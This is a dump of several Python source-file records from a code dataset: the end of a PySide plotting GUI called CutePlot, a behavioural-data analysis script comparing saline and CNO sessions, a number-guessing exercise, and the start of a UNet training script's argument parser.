QCheckBox(\"Log-&y\")\n self.logy_cb.setChecked(False)\n self.connect(self.logy_cb, SIGNAL('stateChanged(int)'), self.on_draw)\n self.logy_cb.setToolTip('Change y-axis to logarithmic scale')\n self.logy_cb.setStatusTip('Change y-axis to logarithmic scale')\n \n # Truncated-log checkbox\n self.trunc_cb = QCheckBox(\"Show &Negative\")\n self.trunc_cb.setChecked(False)\n self.connect(self.trunc_cb, SIGNAL('stateChanged(int)'), self.on_draw)\n self.trunc_cb.setToolTip('Plot negative values of log-transformed functions')\n self.trunc_cb.setStatusTip('Plot negative values of log-transformed functions')\n \n # Grid checkbox\n self.grid_cb = QCheckBox(\"&Grid\")\n self.grid_cb.setChecked(False)\n self.connect(self.grid_cb, SIGNAL('stateChanged(int)'), self.on_minor_change)\n self.grid_cb.setToolTip('Show grid')\n self.grid_cb.setStatusTip('Show grid')\n \n # Grid layout\n grid = QGridLayout()\n grid.setSpacing(10)\n \n gridCol = 0\n for w in [self.title, self.textbox, self.LB_title, self.lowerbound, self.UB_title, \n self.upperbound, self.draw_button]:\n grid.addWidget(w, 0, gridCol)\n gridCol += 1\n \n grid2 = QGridLayout()\n grid2.setSpacing(10)\n gridCol = 0\n for w in [self.logx_cb, self.logy_cb, self.trunc_cb, self.hold_cb, self.grid_cb]:\n grid2.addWidget(w, 0, gridCol)\n gridCol += 1\n \n vbox = QVBoxLayout()\n vbox.addLayout(grid)\n vbox.addLayout(grid2)\n vbox.addWidget(self.canvas)\n vbox.addWidget(self.mpl_toolbar)\n \n self.main_frame.setLayout(vbox)\n self.setCentralWidget(self.main_frame)\n \n \n def on_minor_change(self):\n self.on_draw(self.is_data)\n \n \n def on_draw(self, *args):\n # Get x-domain from user input\n self.LB_input = unicode(self.lowerbound.text())\n self.UB_input = unicode(self.upperbound.text())\n \n # Message box error if the domain inputs aren't int or float types\n # If float, round to the nearest 0.1\n round_to = 10\n try:\n self.LB_float = int(self.LB_input)*round_to\n self.UB_float = int(self.UB_input)*round_to\n except:\n self.LB_UB_defaults()\n QMessageBox.question(self, 'Error',\n '<center>Minimum and maximum values must be<br />\\\n integer or floating-point numbers.</center>', QMessageBox.Ok)\n \n # Make sure UB > LB\n if self.UB_float <= self.LB_float:\n self.LB_UB_defaults()\n QMessageBox.question(self, 'Error',\n '<center>Maximum must be greater\\\n than minimum value.</center>', QMessageBox.Ok)\n \n # If plotting a function, then get x and y values\n if len(args) == 0:\n self.is_data = False\n \n # Set x values (/round_to is to use range() with floating-point numbers)\n self.input_x = range(self.LB_float, self.UB_float + 1)\n self.input_x = [i/float(round_to) for i in self.input_x]\n \n # Calculate f(x) values for specified function\n fx = unicode(self.textbox.text())\n # If the f(x) field is empty, then default to y = 0 plot\n if fx == '':\n self.y = [0 for i in self.input_x]\n # Otherwise, evaluate the specified function and get ready to plot\n else:\n # Replace exp with numbers\n fx = fx.replace('exp', str(exp(1)) + '**')\n # Allow users to enter ^ for powers (replace ^ with **)\n fx = fx.replace('^', '**')\n # Try and evaluate; if there is an error, then shift slightly to the right\n try:\n self.y = [eval(fx) for x in self.input_x]\n except:\n fx = fx.replace('x', '(x + 10**(-6))')\n self.y = [eval(fx) for x in self.input_x] \n self.plot_symbol = '-'\n if self.is_data:\n self.plot_symbol = 'o'\n \n # If the hold box is checked, then new plots do not erase old ones\n new_state = self.quad_check()\n if self.axis_state == 0:\n self.axes.hold(self.hold_cb.isChecked())\n else:\n if self.hold_cb.isChecked():\n # If 'hold' is checked, see what quadrants will be shown\n # - if the quadrant state changes, remove subplots\n # - otherwise retain subplots\n if self.axis_state == 0 and new_state == 0:\n self.axes.hold(self.hold_cb.isChecked())\n elif self.axis_state == 3 and new_state == 3:\n self.axes_Q1.hold(self.hold_cb.isChecked())\n self.axes_Q2.hold(self.hold_cb.isChecked())\n self.axes_Q3.hold(self.hold_cb.isChecked())\n self.axes_Q4.hold(self.hold_cb.isChecked())\n elif self.axis_state == 1 and new_state == 1:\n self.axes_Q1.hold(self.hold_cb.isChecked())\n self.axes_Q2.hold(self.hold_cb.isChecked())\n elif self.axis_state == 2 and new_state == 2:\n self.axes_Q1.hold(self.hold_cb.isChecked())\n self.axes_Q4.hold(self.hold_cb.isChecked())\n else:\n self.remove_subplots()\n else:\n self.remove_subplots()\n \n # If show negative box is unchecked\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.plot(self.input_x, self.y, self.plot_symbol)\n if not self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n self.axes.set_xscale('linear')\n self.axes.set_yscale('linear')\n elif self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n self.axes.set_xscale('log')\n self.axes.set_yscale('linear')\n elif not self.logx_cb.isChecked() and self.logy_cb.isChecked():\n self.axes.set_xscale('linear')\n self.axes.set_yscale('log')\n else:\n self.axes.set_xscale('log')\n self.axes.set_yscale('log')\n else:\n # Linear plot\n #if not self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n if new_state == 0:\n self.add_main()\n self.axes.plot(self.input_x,self.y,self.plot_symbol)\n \n # Log x, linear y plot\n #elif self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n elif new_state == 1:\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.semilogx(self.input_x,self.y,self.plot_symbol)\n else:\n self.trunc_logx()\n \n # Linear x, log y plot\n #elif not self.logx_cb.isChecked() and self.logy_cb.isChecked():\n elif new_state == 2:\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.semilogy(self.input_x,self.y,self.plot_symbol)\n else:\n self.trunc_logy()\n \n # Log-log plot\n else:\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.loglog(self.input_x,self.y,self.plot_symbol)\n else:\n self.trunc_loglog()\n \n # Add grid if grid checkbox is checked\n if self.axis_state == 0:\n self.axes.grid(self.grid_cb.isChecked())\n else:\n if hasattr(self, 'axes_Q1'):\n self.axes_Q1.grid(self.grid_cb.isChecked())\n if hasattr(self, 'axes_Q2'):\n self.axes_Q2.grid(self.grid_cb.isChecked())\n if hasattr(self, 'axes_Q3'):\n self.axes_Q3.grid(self.grid_cb.isChecked())\n if hasattr(self, 'axes_Q4'):\n self.axes_Q4.grid(self.grid_cb.isChecked())\n \n self.axes.set_xlabel('$x$')\n self.axes.set_ylabel('$f(x)$')\n self.canvas.draw()\n self.guardarImagen()\n \n \n def remove_subplots(self):\n # Remove all subplots and axis flip flags\n if hasattr(self, 'axes_Q1'):\n self.fig.delaxes(self.axes_Q1)\n del self.axes_Q1\n if hasattr(self, 'axes_Q2'):\n self.fig.delaxes(self.axes_Q2)\n del self.axes_Q2\n if hasattr(self, 'flip_Q2'):\n del self.flip_Q2\n if hasattr(self, 'axes_Q3'):\n self.fig.delaxes(self.axes_Q3)\n del self.axes_Q3\n del self.flip_Q3\n if hasattr(self, 'axes_Q4'):\n self.fig.delaxes(self.axes_Q4)\n del self.axes_Q4\n if hasattr(self, 'flip_Q4'):\n del self.flip_Q4\n \n def add_main(self):\n # Reinsert the main plot\n if self.axis_state > 0:\n self.remove_subplots()\n self.axes = self.fig.add_subplot(111)\n self.axis_state = 0\n \n def create_menu(self):\n exitAction = QAction('Quit', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.close)\n \n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n \n save_plot_action = self.create_action(\"&Save plot\",\n shortcut = \"Ctrl+S\", slot = self.save_plot, \n tip = \"Save image to file\")\n import_data_action = self.create_action(\"&Import data\",\n shortcut = \"Ctrl+I\", slot = self.import_data,\n tip = \"Import data from file\")\n fileMenu.addAction(save_plot_action)\n fileMenu.addAction(import_data_action)\n fileMenu.addAction(exitAction)\n \n helpMenu = self.menuBar().addMenu(\"&Help\")\n about_action = self.create_action(\"&About\", \n shortcut = 'F1', slot = self.on_about, \n tip = 'About CutePlot')\n helpMenu.addAction(about_action)\n\n def create_action(self, text, slot = None, shortcut = None, \n icon = None, tip = None, checkable = False, \n signal = \"triggered()\"):\n action = QAction(text, self)\n if icon is not None:\n action.setIcon(QIcon(\":/%s.png\" % icon))\n if shortcut is not None:\n action.setShortcut(shortcut)\n if tip is not None:\n action.setToolTip(tip)\n action.setStatusTip(tip)\n if slot is not None:\n self.connect(action, SIGNAL(signal), slot)\n if checkable:\n action.setCheckable(True)\n return action\n \n def save_plot(self):\n file_choices = \"PNG (*.png)\"\n path = unicode(QFileDialog.getSaveFileName(self, 'Save file', '', file_choices))\n if path:\n self.canvas.print_figure(path, dpi = self.dpi)\n self.statusBar().showMessage('Saved to %s' % path, 2000)\n \n def import_data(self):\n file_choices = \"*.csv;;*.txt;;*.tab;;*.dat;;*.*\"\n self.path = QFileDialog.getOpenFileName(self, 'Import data', '', file_choices)\n if self.path:\n datafile = open(self.path[0], 'r')\n if datafile:\n self.is_data = True\n delimiter = ','\n input_xy = [map(float, line.strip().split(delimiter)) for line in datafile]\n self.input_x, self.y = [[row[col] for row in input_xy] for col in [0, 1]]\n datafile.close()\n self.statusBar().showMessage('Imported data', 2000)\n self.on_draw(self.is_data)\n \n def on_about(self):\n msg = \"\"\"<center><b>CutePlot v. 0.1</b></center>\n <center>Free, open-source plotting program,<br />\n written in Python (PySide/Qt + matplotlib).</center>\n <center>(c) Jack Peterson, 2012</center>\n \"\"\"\n QMessageBox.about(self, \"About\", msg.strip())\n \n def quad_check(self):\n # Q = quadrant\n Q1 = False\n Q2 = False\n Q3 = False\n Q4 = False\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1 = True\n elif self.input_x[j] < 0 and self.y[j] > 0:\n Q2 = True\n elif self.input_x[j] < 0 and self.y[j] < 0:\n Q3 = True\n elif self.input_x[j] > 0 and self.y[j] < 0:\n Q4 = True\n \n \n if (Q3 or (Q2 and Q4) or ((Q2 or Q4) and self.axis_state == 3)) and self.logx_cb.isChecked() and self.logy_cb.isChecked():\n new_state = 3\n elif (Q2 and self.logx_cb.isChecked()) or (self.hold_cb.isChecked() and self.axis_state == 1):\n new_state = 1\n elif (Q4 and self.logy_cb.isChecked()) or (self.hold_cb.isChecked() and self.axis_state == 2):\n new_state = 2\n else:\n new_state = 0\n \n return new_state\n \n def trunc_logx(self):\n # Q = quadrant\n Q1_x = []\n Q1_y = []\n Q2_x = []\n Q2_y = []\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1_x.append(self.input_x[j])\n Q1_y.append(self.y[j])\n elif self.input_x[j] < 0 and self.y[j] > 0:\n Q2_x.append(-self.input_x[j])\n Q2_y.append(self.y[j])\n \n # If only Q1 is populated, then use an ordinary semilogx plot\n if Q2_x == [] and not self.hold_cb.isChecked():\n self.add_main()\n self.axes.semilogx(self.input_x, self.y, self.plot_symbol)\n \n # Otherwise, create a truncated plot\n else:\n # Remove main axes\n if self.axis_state == 0:\n self.fig.delaxes(self.axes)\n \n if self.axis_state == 2 or self.axis_state == 3:\n self.axis_state = 3\n else:\n self.axis_state = 1\n \n # Create 2 subplots\n self.axes_Q1 = self.fig.add_subplot(122)\n self.axes_Q2 = self.fig.add_subplot(121)\n self.axes_Q1.autoscale(enable = True)\n self.axes_Q2.autoscale(enable = True)\n self.axes_Q1.semilogx(Q1_x, Q1_y, self.plot_symbol)\n self.axes_Q2.semilogx(Q2_x, Q2_y, self.plot_symbol)\n \n # Reverse Q2 x-axis\n if not hasattr(self, 'flip_Q2'):\n self.flip_Q2 = True\n self.axes_Q2.set_xlim(self.axes_Q2.get_xlim()[::-1])\n \n # Set axis tickmarks at powers of 10\n # Q1 axes\n if Q1_x == [] and not self.hold_cb.isChecked():\n self.axes_Q1.set_xticklabels([])\n else:\n try:\n x_UB_Q1 = int(ceil(log10(max(Q1_x))))\n x_LB_Q1 = int(floor(log10(min(Q1_x))))\n except:\n x_UB_Q1 = 2\n x_LB_Q1 = -1\n Q1_xlabels = []\n for i in range(x_LB_Q1, x_UB_Q1 + 1):\n Q1_xlabels.append('$10^{%s}$' % str(i))\n self.axes_Q1.set_xticklabels(Q1_xlabels)\n self.axes_Q1.xaxis.tick_bottom()\n self.axes_Q1.yaxis.tick_right()\n \n # Q2 axes\n if Q2_x == [] and not self.hold_cb.isChecked():\n self.axes_Q2.set_xticklabels([])\n else:\n try:\n x_UB_Q2 = int(ceil(log10(max(Q2_x))))\n x_LB_Q2 = int(floor(log10(min(Q2_x))))\n except:\n x_UB_Q2 = 2\n x_LB_Q2 = -1\n Q2_xlabels = []\n for i in range(x_LB_Q2, x_UB_Q2 + 1):\n Q2_xlabels.append('$-10^{%s}$' % str(i))\n self.axes_Q2.set_xticklabels(Q2_xlabels)\n self.axes_Q2.xaxis.tick_bottom()\n self.axes_Q2.yaxis.tick_left()\n \n def trunc_logy(self):\n # Q = quadrant\n Q1_x = []\n Q1_y = []\n Q4_x = []\n Q4_y = []\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1_x.append(self.input_x[j])\n Q1_y.append(self.y[j])\n elif self.input_x[j] > 0 and self.y[j] < 0:\n Q4_x.append(self.input_x[j])\n Q4_y.append(-self.y[j])\n \n # If only Q1 is populated, then use an ordinary semilogy plot\n if Q4_x == [] and not self.hold_cb.isChecked():\n self.add_main()\n self.axes.semilogy(self.input_x, self.y, self.plot_symbol)\n \n # Otherwise, create a truncated plot\n else:\n # Remove main axes\n if self.axis_state == 0:\n self.fig.delaxes(self.axes)\n \n if self.axis_state == 1 or self.axis_state == 3:\n self.axis_state = 3\n else:\n self.axis_state = 2\n \n # Create 2 subplots\n self.axes_Q1 = self.fig.add_subplot(211)\n self.axes_Q4 = self.fig.add_subplot(212)\n self.axes_Q1.autoscale(enable = True)\n self.axes_Q4.autoscale(enable = True)\n self.axes_Q1.semilogy(Q1_x, Q1_y, self.plot_symbol)\n self.axes_Q4.semilogy(Q4_x, Q4_y, self.plot_symbol)\n \n # Reverse Q4 y-axis\n if not hasattr(self, 'flip_Q4'):\n self.flip_Q4 = True\n self.axes_Q4.set_ylim(self.axes_Q4.get_ylim()[::-1])\n \n # Set axis tickmarks at powers of 10\n # Q1 axes\n if Q1_x == [] and not self.hold_cb.isChecked():\n self.axes_Q1.set_yticklabels([])\n else:\n try:\n y_UB_Q1 = int(ceil(log10(max(Q1_y))))\n y_LB_Q1 = int(floor(log10(min(Q1_y))))\n except:\n y_UB_Q1 = 2\n y_LB_Q1 = -1\n Q1_ylabels = []\n for i in range(y_LB_Q1, y_UB_Q1 + 1):\n Q1_ylabels.append('$10^{%s}$' % str(i))\n self.axes_Q1.set_yticklabels(Q1_ylabels)\n self.axes_Q1.xaxis.tick_top()\n self.axes_Q1.yaxis.tick_right()\n \n # Q4 axes\n if Q4_x == [] and not self.hold_cb.isChecked():\n self.axes_Q4.set_yticklabels([])\n else:\n try:\n y_UB_Q4 = int(ceil(log10(max(Q4_y))))\n y_LB_Q4 = int(floor(log10(min(Q4_y))))\n except:\n y_UB_Q4 = 2\n y_LB_Q4 = -1\n Q4_ylabels = []\n for i in range(y_LB_Q4, y_UB_Q4 + 1):\n Q4_ylabels.append('$-10^{%s}$' % str(i))\n self.axes_Q4.set_yticklabels(Q4_ylabels)\n self.axes_Q4.xaxis.tick_bottom()\n self.axes_Q4.yaxis.tick_right()\n \n \n def trunc_loglog(self):\n # Q = quadrant\n Q1_x = []\n Q1_y = []\n Q2_x = []\n Q2_y = []\n Q3_x = []\n Q3_y = []\n Q4_x = []\n Q4_y = []\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1_x.append(self.input_x[j])\n Q1_y.append(self.y[j])\n elif self.input_x[j] < 0 and self.y[j] > 0:\n Q2_x.append(-self.input_x[j])\n Q2_y.append(self.y[j])\n elif self.input_x[j] < 0 and self.y[j] < 0:\n Q3_x.append(-self.input_x[j])\n Q3_y.append(-self.y[j])\n elif self.input_x[j] > 0 and self.y[j] < 0:\n Q4_x.append(self.input_x[j])\n Q4_y.append(-self.y[j])\n \n # If only Q1 is populated, then use an ordinary loglog plot\n if Q2_x == [] and Q3_x == [] and Q4_x == [] and not self.hold_cb.isChecked():\n self.add_main()\n self.axes.loglog(self.input_x, self.y, self.plot_symbol)\n \n # Otherwise, create a truncated plot\n else:\n # Remove main axes\n if self.axis_state == 0:\n self.fig.delaxes(self.axes)\n self.axis_state = 3\n \n # Create 4 subplots\n self.axes_Q1 = self.fig.add_subplot(222)\n self.axes_Q2 = self.fig.add_subplot(221)\n self.axes_Q3 = self.fig.add_subplot(223)\n self.axes_Q4 = self.fig.add_subplot(224)\n self.axes_Q1.autoscale(enable = True)\n self.axes_Q2.autoscale(enable = True)\n self.axes_Q3.autoscale(enable = True)\n self.axes_Q4.autoscale(enable = True)\n self.axes_Q1.loglog(Q1_x, Q1_y, self.plot_symbol)\n self.axes_Q2.loglog(Q2_x, Q2_y, self.plot_symbol)\n self.axes_Q3.loglog(Q3_x, Q3_y, self.plot_symbol)\n self.axes_Q4.loglog(Q4_x, Q4_y, self.plot_symbol)\n \n if not hasattr(self, 'flip_Q3'):\n self.flip_Q3 = True\n \n # Reverse Q2 x-axis\n self.axes_Q2.set_xlim(self.axes_Q2.get_xlim()[::-1]) \n \n # Reverse Q3 x- and y-axes\n self.axes_Q3.set_xlim(self.axes_Q3.get_xlim()[::-1])\n self.axes_Q3.set_ylim(self.axes_Q3.get_ylim()[::-1])\n \n # Reverse Q4 y-axis\n self.axes_Q4.set_ylim(self.axes_Q4.get_ylim()[::-1])\n \n # Set axis tickmarks at powers of 10\n # Q1 axes\n if Q1_x == [] and not self.hold_cb.isChecked():\n self.axes_Q1.set_xticklabels([])\n self.axes_Q1.set_yticklabels([])\n else:\n try:\n x_UB_Q1 = int(ceil(log10(max(Q1_x))))\n y_UB_Q1 = int(ceil(log10(max(Q1_y))))\n x_LB_Q1 = int(floor(log10(min(Q1_x))))\n y_LB_Q1 = int(floor(log10(min(Q1_y))))\n except:\n x_UB_Q1 = 2\n y_UB_Q1 = 2\n x_LB_Q1 = -1\n y_LB_Q1 = -1\n Q1_xlabels = []\n Q1_ylabels = []\n for i in range(x_LB_Q1, x_UB_Q1 + 1):\n Q1_xlabels.append('$10^{%s}$' % str(i))\n for i in range(y_LB_Q1, y_UB_Q1 + 1):\n Q1_ylabels.append('$10^{%s}$' % str(i))\n self.axes_Q1.set_xticklabels(Q1_xlabels)\n self.axes_Q1.set_yticklabels(Q1_ylabels)\n self.axes_Q1.xaxis.tick_top()\n self.axes_Q1.yaxis.tick_right()\n \n # Q2 axes\n if Q2_x == [] and not self.hold_cb.isChecked():\n self.axes_Q2.set_xticklabels([])\n self.axes_Q2.set_yticklabels([])\n else:\n try:\n x_UB_Q2 = int(ceil(log10(max(Q2_x))))\n y_UB_Q2 = int(ceil(log10(max(Q2_y))))\n x_LB_Q2 = int(floor(log10(min(Q2_x))))\n y_LB_Q2 = int(floor(log10(min(Q2_y))))\n except:\n x_UB_Q2 = 2\n y_UB_Q2 = 2\n x_LB_Q2 = -1\n y_LB_Q2 = -1\n Q2_xlabels = []\n Q2_ylabels = []\n for i in range(x_LB_Q2, x_UB_Q2 + 1):\n Q2_xlabels.append('$-10^{%s}$' % str(i))\n for i in range(y_LB_Q2, y_UB_Q2 + 1):\n Q2_ylabels.append('$10^{%s}$' % str(i))\n self.axes_Q2.set_xticklabels(Q2_xlabels)\n self.axes_Q2.set_yticklabels(Q2_ylabels)\n self.axes_Q2.xaxis.tick_top()\n self.axes_Q2.yaxis.tick_left()\n \n # Q3 axes\n if Q3_x == [] and not self.hold_cb.isChecked():\n self.axes_Q3.set_xticklabels([])\n self.axes_Q3.set_yticklabels([])\n else:\n try:\n x_UB_Q3 = int(ceil(log10(max(Q3_x))))\n y_UB_Q3 = int(ceil(log10(max(Q3_y))))\n x_LB_Q3 = int(floor(log10(min(Q3_x))))\n y_LB_Q3 = int(floor(log10(min(Q3_y))))\n except:\n x_UB_Q3 = 2\n y_UB_Q3 = 2\n x_LB_Q3 = -1\n y_LB_Q3 = -1\n Q3_xlabels = []\n Q3_ylabels = []\n for i in range(x_LB_Q3, x_UB_Q3 + 1):\n Q3_xlabels.append('$-10^{%s}$' % str(i))\n for i in range(y_LB_Q3, y_UB_Q3 + 1):\n Q3_ylabels.append('$-10^{%s}$' % str(i))\n self.axes_Q3.set_xticklabels(Q3_xlabels)\n self.axes_Q3.set_yticklabels(Q3_ylabels)\n self.axes_Q3.xaxis.tick_bottom()\n self.axes_Q3.yaxis.tick_left()\n \n # Q4 axes\n if Q4_x == [] and not self.hold_cb.isChecked():\n self.axes_Q4.set_xticklabels([])\n self.axes_Q4.set_yticklabels([])\n else:\n try:\n x_UB_Q4 = int(ceil(log10(max(Q4_x))))\n y_UB_Q4 = int(ceil(log10(max(Q4_y))))\n x_LB_Q4 = int(floor(log10(min(Q4_x))))\n y_LB_Q4 = int(floor(log10(min(Q4_y))))\n except:\n x_UB_Q4 = 2\n y_UB_Q4 = 2\n x_LB_Q4 = -1\n y_LB_Q4 = -1\n Q4_xlabels = []\n Q4_ylabels = []\n for i in range(x_LB_Q4, x_UB_Q4 + 1):\n Q4_xlabels.append('$10^{%s}$' % str(i))\n for i in range(y_LB_Q4, y_UB_Q4 + 1):\n Q4_ylabels.append('$-10^{%s}$' % str(i))\n self.axes_Q4.set_xticklabels(Q4_xlabels)\n self.axes_Q4.set_yticklabels(Q4_ylabels)\n self.axes_Q4.xaxis.tick_bottom()\n self.axes_Q4.yaxis.tick_right()\n \n \n def guardarImagen(self):\n path = os.path.abspath(\"untitled.png\") \n self.canvas.resize(460,261 ) \n self.canvas.print_figure(path, dpi = self.dpi)\n self.statusBar().showMessage('Saved to %s' % path, 2000)\n self.canvas.resize(560,361 ) \n \ndef main():\n # Check if QApplication already exists; if not, create it!\n # (IPython compatibility)\n app2 = QApplication.instance()\n if not app2:\n app2 = QApplication(sys.argv)\n cp = CutePlot()\n cp.show()\n \n app2.exec_()\n \nif __name__ == '__main__':\n main()\n\n'''if __name__ == \"__main__\":\n app2 = QApplication(sys.argv)\n window = CutePlot()\n window.show()\n sys.exit(app2.exec_())'''","sub_path":"ProyectoMetodosNumericos/Graficador/CutePlot.py","file_name":"CutePlot.py","file_ext":"py","file_size_in_byte":31344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542501503","text":"from soup.classic import *\nfrom soup import pretty\nfrom routines import psy_fit, psy, chro, prettyleg, psylab\nimport matplotlib.gridspec as gridspec\nfrom statsmodels.discrete.discrete_model import Logit\nfrom scipy import signal\nimport os,json\n\n### Parameters\ndata_path = '/Users/ben/data/puffs/cohort_1/trunc.h5'\ndata_path_c0 = '/Users/ben/data/puffs/cohort_1/data_c0.h5'\ndata_path_c1_old = ['/Users/ben/data/puffs/cohort_1/data_c1_prepandas_0.h5','/Users/ben/data/puffs/cohort_1/data_c1_prepandas_1.h5']\nfigs = [0]\npp = dict(fmt='o', markeredgewidth=0) #plot params for psy\nlegp = dict(loc='best', fontsize='large', numpoints=1, frameon=False, markerscale=0, markerfirst=False)\ncmap = pl.cm.spectral\n\n### Load data\nwith pd.HDFStore(data_path) as hdf:\n trials = hdf.trials\n\n### Preprocessing\ntrials = trials[~trials.subj.isin([0,16])] # exclude test subjects\nusub = np.sort(trials.subj.unique()).tolist()\ntrials.subj = trials.subj.map(lambda x: usub.index(x)) #rename subjects\n\n### analysis\ntrials = trials[trials.condition.isin([2,1])] #sal, cno\ntrials = trials[trials.outcome<2]\noksesh = np.array([s for s in trials.session.unique() if (trials.session==s).sum()>50])\ntrials = trials[trials.session.isin(oksesh)]\n\ntrials = trials[trials.subj.isin([1,2])]\n\n# heatmap analysis\nchunk = 10\nnchunks = 8\nresults = np.zeros([len(trials.session.unique()), nchunks])\nresults[:] = np.nan\nses_idx = 0\ncond_labels = np.empty(len(results))\n\n# performance as function of last trials analysis\ndatapoints = []\n\n# within-session\nwsesh = []\n\nfor s,c in zip(trials.subj.unique(), pl.cm.viridis(np.linspace(0,1,len(trials.subj.unique())))):\n t = trials[trials.subj==s]\n t.reset_index(drop=True, inplace=True)\n \n # basic binned leanring curves\n pl.figure(1)\n ch = 150\n lc = [t.iloc[i*ch:ch*i+ch].outcome.mean() for i in np.arange(len(t)//ch)]\n pl.plot(lc)\n\n #within-session learning\n for us in t.session.unique():\n ts = t[t.session==us]\n baseline = t.iloc[ts.index[0]-50:].outcome.mean()\n con = ts.condition.mean()\n step = 20\n steps = []\n for i in range(0,180,step):\n steps.append(ts.iloc[i:i+step].outcome.mean()-baseline)\n #wsesh.append((con, ts.iloc[-50:].outcome.mean()-ts.iloc[:50].outcome.mean()))\n wsesh.append((con,steps))\n\n # perf as fxn of last trials\n win = 50\n perf = t.outcome.rolling(win).mean()\n last = t.condition.rolling(win).mean()\n sesh = t.session.diff()\n datapoints.append((last,perf,sesh))\n\n # heatmap\n for us in t.session.unique():\n ts = t[t.session==us]\n i0 = np.where(t.session==us)[0][0]\n cond_labels[ses_idx] = ts.condition.mean()\n for chi,ch in enumerate(np.arange(0, chunk*nchunks, chunk)):\n follow = t.ix[ts.index[-1]:ts.index[-1]+ch+chunk] #cumulative\n results[ses_idx, chi] = follow.outcome.mean() - t.iloc[i0-3*chunk:].outcome.mean()\n ses_idx += 1\n\n#assert sum([np.any(np.isnan(i)) for i in results]) == len(trials.subj.unique()) #each subj has a last day\nexclude = np.array([np.any(np.isnan(i)) for i in results])\nresults = results[~exclude]\ncond_labels = cond_labels[~exclude]\nfig,axs = pl.subplots(2,2); axs=axs.ravel()\nimsh1=axs[0].imshow(results[cond_labels==2], interpolation='nearest', vmin=0, vmax=1)\n#pl.colorbar(imsh1)\nimsh2=axs[1].imshow(results[cond_labels==1], interpolation='nearest', vmin=0, vmax=1)\npl.colorbar(imsh2, ax=axs[1])\naxs[0].set_title('Saline')\naxs[1].set_title('CNO')\naxs[0].set_xlabel('Trials')\naxs[1].set_xlabel('Trials')\naxs[0].set_xticks([])\naxs[1].set_xticks([])\naxs[0].set_yticks([])\naxs[1].set_yticks([])\naxs[0].set_ylabel('Sessions')\n#axs[1].set_ylabel('Sessions')\naxs[0].set_aspect(0.4)\naxs[1].set_aspect(0.4)\naxs[2].plot(results[cond_labels==2].mean(axis=0))\naxs[3].plot(results[cond_labels==1].mean(axis=0))\n#axs[2].set_ylim([-.04,.04])\n#axs[3].set_ylim([-.04,.04])\n#axs[3].set_yticks([])\naxs[2].set_ylabel('∆ performance')\n\nfig,axs = pl.subplots(len(datapoints),1,sharex=True, figsize=(15,9)); axs=axs.ravel()\nfor dp,ax in zip(datapoints,axs):\n last,perf,sesh = dp\n #sesh = np.append(0,sesh)\n sesh = sesh>0\n last,perf = map(np.asarray, [last,perf])\n sesh = sesh[~np.isnan(last)]\n last = last[~np.isnan(last)]\n perf = perf[~np.isnan(perf)]\n ax.plot((last-1)/2+0.5, label='condition (low=CNO)')\n ax.plot(perf, label='rolling performance')\n ax.plot(sesh/2+0.5, linestyle='--', label='session breaks')\n ax.legend(loc='best', fontsize=10)\n #pl.xlabel('avg condition over previous n trials')\n #pl.ylabel('change in performance from previous n trials to future n trials')\n\n#pl.figure(4)\nones = [i[1] for i in wsesh if i[0]==1]\ntwos = [i[1] for i in wsesh if i[0]==2]\n#pl.boxplot([twos,ones])\n#pl.xticks([1,2],['saline','cno'])\n","sub_path":"analysis/c1/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"93447595","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'ByStudent'\nnumber = 59\nguess = int(input(\"Please enter an integer: \"))\nif guess == number:\n print ('Bingo! you guessed it right.')\nelif guess > number:\n print ('No!the number is a higher than that.')\nelse:\n print ('No! the number is a lower than that.')\nprint ('Done')","sub_path":"TestIf.py","file_name":"TestIf.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549042796","text":"import sys\nimport os\nfrom optparse import OptionParser\n\nimport numpy as np\nimport torch\nimport torchvision\nimport torch.nn as nn\nfrom torch import optim\n\nimport sys\nimport os\nfrom optparse import OptionParser\nimport numpy as np\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom tqdm import tqdm\n\nfrom eval import eval_net,test_net\nfrom unet import UNet,UNet1,ResNetUNet,FCN8s,VGGNet\nfrom utils import *\nimport vnet\nfrom torchvision.models import vgg16\nimport segmentation_models_pytorch as smp\n\ndef get_args():\n parser = OptionParser()\n parser.add_option('-e', '--epochs', dest='epochs', default=200, type='int',\n help='number of epochs')\n parser.add_option('-b', '--batchsize', dest='batchsize', default=8,\n type='int', help='batch size')\n parser.add_option('-l', '--learning-rate', dest='lr', default=0.001,\n type='float', help='learning rate')\n parser.add_option('-g', '--gpu', action='store_true', dest='gpu',\n default=True, help='use cuda')\n parser.add_option('--test',action='store_true',dest='test',default = False,help='use test mode')\n parser.add_option('-c', '--load', type=str,\n default='', help='load file model')\n parser.add_option('--gpu_id',default = '1',type = 'str',help = 'choose the target gpu')\n parser.add_option('--start_epoch',default = '0',type = int,help = 'use to continue the training scheme')\n parser.add_option('--optimizer',default= 'SGD',type = str,help='control the mode of optimizer')\n parser.add_option('--sparse_iteration',default =3,type= int)\n parser.add_option('--sparse_ratio',default=0.4,type=float)\n parser.add_option('--arch',default='',type=str)\n 